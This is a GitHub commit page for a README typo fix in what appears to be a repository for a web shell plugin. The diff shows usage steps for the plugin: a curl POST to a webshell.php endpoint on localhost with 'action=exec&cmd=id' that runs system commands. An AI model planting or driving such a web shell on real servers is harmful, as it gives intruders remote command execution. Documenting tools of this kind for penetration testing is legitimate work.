Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
p0dalirius authored May 21, 2022
1 parent c446f17 commit 88812b7
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -27,7 +27,7 @@ Go to "Configuration --> plugins" page, at http://localhost:10080/index.php/admi

### Step 2.1: Executing commands

You can now execute commands by sending a GET or POST request to http://127.0.01/upload/plugins/WebShell/webshell.php with `action=exec&cmd=id`:
You can now execute commands by sending a GET or POST request to http://127.0.0.1/upload/plugins/WebShell/webshell.php with `action=exec&cmd=id`:

```sh
$ curl -X POST 'http://localhost:10080/upload/plugins/WebShell/webshell.php' --data "action=exec&cmd=id"
Expand Down

0 comments on commit 88812b7

Please sign in to comment.